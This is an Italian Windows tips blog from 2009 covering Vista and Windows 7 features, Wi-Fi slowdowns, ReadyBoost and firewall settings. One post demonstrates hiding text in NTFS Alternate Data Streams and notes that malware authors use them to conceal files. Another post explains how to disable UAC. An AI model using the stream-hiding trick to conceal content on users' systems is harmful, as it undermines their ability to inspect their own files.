Apportiamo i cambiamenti desiderati e confermiamoli cliccando sul pulsante Salva cambiamenti

martedì 26 maggio 2009

Windows 7 o Vista Second Edition?

Nonostante il cambio di nome, un nuovo logo e una campagna di marketing dedicata, sono in molti a ritenere che Windows 7 sia in realtà un Windows Vista Second Edition, ossia non un sistema operativo nuovo bensì semplicemente un miglioramento quanto a prestazioni, velocità di esecuzione e soprattutto sete di risorse hardware (potrà essere montato anche sui netbook) rispetto a Vista, dal quale Windows 7 eredita kernel, gestione drivers, compatibilità dei programmi, etc…

In fondo perchè stupirsi? Ogni volta che Microsoft ha rilasciato un sistema operativo che non ha incontrato il favore del pubblico o che presentava problemi di base, lo ha prontamente sostituito con una versione successiva, aggiornata e migliorata: Windows 3.0 fu sostituito dall’ottimo Windows 3.1, Windows 98 da Windows 98 SE, Windows XP aggiornato e migliorato con le SP.La differenza con le volte precedenti sta nel fatto che stavolta Microsoft vuole scrollarsi di dosso anche il nome proponendo questo aggiornamento come un vero e proprio nuovo sistema operativo.

Windows 7 e Virtual Windows Xp Mode

Quando arriva un sistema operativo nuovo c'è sempre il rischio che programmi che giravano una meraviglia sul precedente sistema, non sono compatibili col nuovo. Proprio per evitare ciò, Microsoft ha pensato di integrare in Windows 7 Virtual Windows Xp Mode, che consentirà di eseguire le applicazioni che giravano su Windows Xp come se fossero software nativo per Windows 7.

Vista, modificare l'associazione di un file al programma predefinito

In Vista per modificare l'associazione di un file al programma predefinito basta accedere al Pannello di controllo, fare doppio clic sull’icona Programmi predefiniti



quindi su Associa un tipo di file o un protocollo a un programma



Rallentamento connessione Wi-Fi

Se utilizzate Windows XP o Windows Vista vi sarà certamente capitato ogni tanto che la vostra connessione senza fili subisca improvvisi rallentamenti. La causa potrebbe essere l'avvio in automatico del servizio che cerca eventuali nuove reti wireless disponibili. Scoprire se la colpa del problema è questo è facile: nel prompt dei comandi digitate
ping -t www.google.com
premete il tasto Invio ed osservate i risultati visualizzati dal comando impartito. Se il risultato è caratterizzato da tanti sbalzi temporali si tratta proprio del problema di cui ci occupiamo in questo post. Il problema è risolvibile con dei programmini freeware.

Se utilizzate Windows XP, il programma è Wireless Zero Shutdown. Avviatelo e selezionate la voce Enable automatic control dal menu Control: il programma, a connessione wireless effettuata, stopperà automaticamente il servizio “Wireless Zero Configuration” evitiando così i rallentamenti momentanei nella navigazione.

Su Vista il servizio che causa i “lag” di rete si chiama “Configurazione automatica WLAN”,. Il programma da utilizzare per risolvere il problema è Vista Anti-Lag, freeware. Avviatelo e cliccate sul pulsante activate VAL. A connessione wireless effettuata, verrà stoppato automaticamente il servizio prima citato e verranno così evitati i rallentamenti momentanei nella navigazione.

Creare un ADS

Creiamo un ADS, che nasconda in un file txt (chiamato ad esempio: poesia.txt) un testo segreto (ad esempio: Questo è un flusso alternativo nascosto)
Apriamo il prompt dei comandi e utilizzando il comando echo creiamo un file di testo chiamato poesia.txt avente come testo:M'illumino d'immenso.

echo M'illumino d'immenso>poesia.txt




Poi utilizzando la medesima sintassi ma stavolta con il data stream aggiuntivo denominato “ungaretti” (ma potrebbe anche chiamarsi “segreto”, “ciao”, "poropoponzi"…), aggiungiamo al file di testo poesia.txt il seguente testo segreto: Questo è un flusso alternativo nascosto

echo Questo è un flusso alternativo nascosto >poesia.txt:ungaretti



A questo punto abbiamo un file “poesia.txt” che se aperto con il normale doppio click visualizzerà il seguente contenuto: M'illumino d'immenso,



ma se aperto con la sintassi che specifica lo stream aggiuntivo

more < poesia.txt:ungaretti
vedrete il seguente contenuto: Questo è un flusso alternativo nascosto



Alternate Data Streams (ADS) e pericoli per la sicurezza

Alternate Data Streams (ADS) è una funzione implementata dal file system NTFS sconosciuta ai più. Quando viene creato un file, il sistema operativo gli associa due flussi di dati: un flusso di dati principale, di fatto il suo contenuto ossia i dati visualizzabili dall'utente aprendo il documento con la opportuna applicazione.

Molti non sanno però che oltre ai flussi principali, vi sono anche quelli alternativi, che a differenza dei primi sono nascosti e inaccessibili dall'Esplora Risorse di Windows.

Gli Alternate Data Streams (ADS) sono letteralmente i "Flussi di dati alternativi". Essi consentono all'utente di nascondere all'interno di un file delle informazioni, o addirittura un altro file.

Il bello è che il file a cui vengono associati dei flussi alternativi non subisce modifiche di nessun genere. Anche aggiungendo un flusso di grandezza pari a vari GB la dimensione del file, così come visualizzata dal sistema operativo, rimane la stessa!!
Questa funzionalità piace molto ai virus-writer che la utilizzano come veicolo di malware di ogni tipo. Infatti grazie agli ADS è possibile correlare a un file non solo informazioni testuali ma anche ad esempio un altro file, con la sola caratteristica che questo sarà praticamente invisibile e inaccessibile e potrà comunque essere avviato senza procedura di decrittazione o decompressione.

In più, poiché non viene alterata nessuna caratteristica del file e il sistema non notifica la presenza di flussi alternativi, questa tecnologia rende praticamente impossibile a un utente (a prescindere che sia eseprto o meno) determinare se il file scaricato contiene o meno degli ADS.

Se uso Linux invece di Windows, posso avere la certezza che non sarò mai attaccabile da malintenzonati online?

Esistono virus e minacce alla sicurezza e alla stabilità del sistema anche per le piattaforme linux. E comunque esistono tecniche che sfruttando bug all'interno dei processori consentono ai malintenzionati di prendere possesso di un pc indipendentemente dal sistema operativo installato
L'anno scorso il ricercatore Kris Kaspersky (omonimo nel noto antivirus), esperto in sicurezza e autore di diversi libri sull'argomento, ha annunciato la scoperta di un bug all'interno dei processori per computer prodotti da Intel che permetterebbe a un malintenzionato di prendere possesso di un pc indipendentemente dal sistema operativo installato, Windows o Linux che sia.

Kaspesky ha indicato che la falla è sfruttabile in tutti i computer in grado di eseguire JavaScript (ovvero ogni browser web disponibile attualmente) e in grado di ricevere dati TCP/IP (ovvero se connessi in rete).

Patch Microsoft: differenza tra Critical e Important

Forse perchè nella lingua italiana l'aggettivo "critico" ha una sfumatura che rimanda all'idea di pericolosità assente invece nell'aggettivo "importante", ma molti di noi quando devono installare patch Microsoft prendono in maggiore considerazione quelle definite "critical" rispetto a quelle definite "important" ritenendole più importanti per evitare situazioni critiche e pericolose connesse al mancato aggiornamento del sistema. Ma quale è la vera differenza tra i due tipi di patch? Nel novembre 2002 Microsoft è passata da una classificazione del livello di severity dei bollettini a 3 valori all’attuale in uso che prevede 4 livelli sdoppiando in due livelli distinti il livello più alto, per sottolineare il diverso livello di rischio rispetto alla minaccia dei worm:

Critical: A vulnerability whose exploitation could allow the propagation of an Internet worm without user action.
Important: A vulnerability whose exploitation could result in compromise of the confidentiality, integrity, or availability of users data, or of the integrity or availability of processing resources.

Quindi i bollettini Important si devono considerare con la stessa serietà con cui consideriamo quelli definiti Critical. I bollettini Important rispetto a quelli Critical escludono solo il rischio di sfruttamento tramite worm che si propaga automaticamente!

Ripristinare le impostazioni predefinite del firewall di Vista

Ripristinare le impostazioni predefinite del firewall di Windows potrebbe essere necessario quando abbiamo fatto troppi pasticci nei settaggi del firewall e non riusciamo più a venirne fuori. In Vista per ripristinare le impostazioni predefinite del firewall bisogna cliccare due volte su Windows Firewall in Pannello di controllo




Si apre la finestra Windows Firewall dove clicchiamo su Modifica impostazioni.



Nella finestra che appare portiamo in primo piano la scheda Avanzate e qui clicchiamo sul pulsante Ripristina. Quindi confermiamo con OK

lunedì 25 maggio 2009

Funzione ReadyBoost, il dispositivo USB non migliora le prestazioni

Le periferiche USB sono diverse tra loro. La memoria flash in esse contenuta può essere lenta o veloce, ma ai fini della funzione ReadyBoost la qualità più importante consiste nell'uniformità delle prestazioni. Inoltre, la quantità di memoria consigliata per l'utilizzo della funzione di velocizzazione ReadyBoost corrisponde a 1:3 rispetto alla quantità di RAM presente nel computer. Ad esempio, se il computer dispone di 512 MB di RAM e l'unità di archiviazione ha una memoria di 256 MB, il miglioramento delle prestazioni risulta trascurabile.
Fonte:

Come si disattiva la funzione ReadyBoost?

1.
Inserire nel computer la scheda di memoria o il dispositivo di archiviazione del quale si vuole disattivare la funzione ReadyBoost
2.
Fare clic su Start , quindi su Computer .
3.
Fare clic con il pulsante destro del mouse sull'icona del dispositivo di archiviazione esterno e selezionare Proprietà .
4.
Fare clic sulla scheda ReadyBoost .
5.
Selezionare Non usare questo dispositivo


6.
Fare clic su OK .

Come si fa ad utilizzare la funzione ReadyBoost?

1.
Accendere il computer.
2.
Inserire il dispositivo USB nell'apposita porta.
Windows esegue un rapido test per controllare che il dispositivo sia compatibile con la funzione ReadyBoost, quindi viene visualizzata la finestra AutoPlay
3.
Nella finestra AutoPlay, sezione Opzioni generali , fare clic su Migliora la velocità del sistema per aprire la finestra a schede ReadyBoost.
Figura 1: Finestra AutoPlay


NOTA:
Se la finestra AutoPlay non si apre automaticamente: Fare clic su Start , Computer , quindi, con il pulsante destro del mouse, fare clic sul dispositivo USB. Nel menu a discesa, fare clic su Proprietà e accedere alla scheda ReadyBoost .
Figura 2: Scheda ReadyBoost



4.
Fare clic su Usa dispositivo .
Abilitare o disabilitare Windows ReadyBoost per una specifica unità flash. Se non si ha più bisogno di utilizzare il dispositivo di archiviazione USB per la funzione ReadyBoost e si desidera tornare a utilizzarlo per l'archiviazione dei file, accedere alla finestra ReadyBoost e selezionare Non usare dispositivo. A questo punto, è possibile utilizzare nuovamente il dispositivo per l'archiviazione e il trasferimento dei file.
5.
Utilizzare il dispositivo di scorrimento per assegnare alla funzione ReadyBoost la quantità di spazio desiderata.
Se lo spazio non viene assegnato al 100%, lo spazio residuo può essere utilizzato per l'archiviazione (solo mentre l'unità non viene utilizzata da ReadyBoost per migliorare le prestazioni).
6.
Fare clic su OK .
La funzione ReadyBoost è ora abilitata in modo da utilizzare il dispositivo USB per rendere più efficiente l'elaborazione dei dati da parte del computer.
Fonte:

Quali sono i requisiti per poter utilizzare la funzione ReadyBoost?

1.
Il computer deve disporre di una porta USB 2.0.
2.
Il dispositivo USB deve disporre di una quantità di memoria compresa tra 256 MB e 4 GB. Inoltre, il dispositivo USB deve essere abbastanza veloce: almeno 3,5 MB/s in lettura e di 2,5 MB/s in scrittura. Queste informazioni sono in genere indicate sulla confezione. Se non siete più in possesso della confezione,potete provare senza alcun rischio a eseguire la procedura con il dispositivo di archiviazione USB che avete. Se l'unità di memoria non può essere utilizzata viene visualizzato un messaggio di errore.
È opportuno eliminare tutti i file dall'unità di memoria prima di utilizzarla per la funzione ReadyBoost.

La funzione ReadyBoost di Windows Vista

La funzione ReadyBoost di Windows Vista è uno strumento che consente di aumentare la velocità del computer utilizzando lo spazio di archiviazione disponibile dei supporti rimovibili, ad esempio unità memoria flash USB. L'unità di memoria flash funge da memoria cache aggiuntiva alla quale il computer accede molto più rapidamente rispetto ai dati presenti sul disco rigido.
Per questo scopo è possibile utilizzare una sola unità di memoria flash per volta.
ATTENZIONE: possono essere utilizzati molti tipi di unità flash, ma non tutti.
Per conoscere i requisiti necessari per poter utilizzare la funzione ReadyBoost clicca qui

Sostituire il doppio clic con un clic solo

Perchè fare con due clic quello che è possibile fare con un clic solo? In Windows, per impostazione predefinita, per avviare un programma, per aprire i documenti, bisogna fare doppio clic su di essi. Se però ad esempio lavoriamo con un portatile e senza mouse fare doppio clic potrebbe risultare piuttosto scomodo. Niente paura: è possibile dire a Windows di sostituire il doppio clic con un clic solo. In Pannello di controllo clicchiamo due volte su Opzioni cartella. Si apre la finestra Opzioni cartella. Nella scheda Generale, nella zona Selezione e apertura oggetti, selezioniamo Un clic per aprire l'oggetto (selezione al passaggio del mouse). Confermiamo dando OK


Disattivare i messaggi di allarme del Controllo account utente

Una delle nuove funzionalità presenti in Windows Vista è il Controllo dell’account utente, un sistema di sicurezza che si occupa di verificare che l’utilizzatore del computer abbia le credenziali per poter effettuare determinate operazioni. L’amministratore del sistema può, accedendo al Pannello di controllo, decidere se attivarlo o meno, esponendo in quest’ultimo caso il sistema a pericoli derivanti da un eventuale uso improprio da parte di terzi.
E’ una funzione particolarmente utile per gli utenti meno esperti, ai quali viene segnalata la potenziale pericolosità di un’installazione (magari involontaria) o della modifica di una determinata impostazione di sistema.
Per disattivare il Controllo account utente cliccate due volte su Account utente in Pannello di controllo. Nella finestra che si apre, scegliete il collegamento Attiva o disattiva Controllo account utente.



Nella finestra successiva, deselzionate Per proteggere il computer, utilizzare il controllo dell'account utente. Confermate dando OK






Tenete presente che con questa operazione il vostro computer è meno protetto!!

Bloccare la Barra delle applicazioni

La Barra delle applicazioni di Windows è modificabile: possiamo ingrandirla, spostarla da un bordo all'altro dello schermo, possiamo anche dimensionare la zona di avvio veloce. C'è però il rischio di apportare queste modifiche involontariamente, per colpa di un clic sbagliato. Per evitare questo rischio, possiamo bloccare la barra in questione. Per farlo basta fare clic destro su un punto vuoto della Barra delle applicazioni e scegliere Blocca la barra delle applicazioni dal menu contestuale


3G HSDPA

3G è un termine generico che identifica gli apparecchi e i servizi mobili di "terza generazione". Il 3G offre servizi come la videofonia, il collegamento veloce a internet su cellulare, la televisione in diretta. La variante 3G HSDPA, chiamata anche 3,5G, ha prestazioni 10 volte superiori alla 3G raggiungendo velocità simili all'ADSL:da 1,8 Mbit/s a 14,4 Mbit/s in download. Per sfruttare le reti 3G bisogna trovarsi in un'area coperta dal servizio

Velocizzare lo spegnimento del pc riprogrammando il pulsante di alimentazione del menu Start

In Vista quando clicchiamo sul pulsante di alimentazione del menu Start, Windows si mette automaticamente in standby. E' tuttavia possibile riconfigurare il pulsante per usarlo per spegnere il pc anzichè metterlo in standby.
In Pannello di controllo cliccare due volte su Opzioni risparmio energia. Nella colonna sinistra delle finestra che si apre cliccare su Modifica impostazioni di sospensione del computer.




Nella finestra che si apre cliccare Cambia impostazioni avanzate risparmio energia.



Si apre una finestra in cui selezioniamo l'opzione Pulsanti di alimentazione e coperchio, poi Pulsante di alimentazione menu Start. Nelle caselle di riepilogo Alimentazione da rete elettrica e Alimentazione a batteria scegliere Arresta il sistema anzichè di Sospensione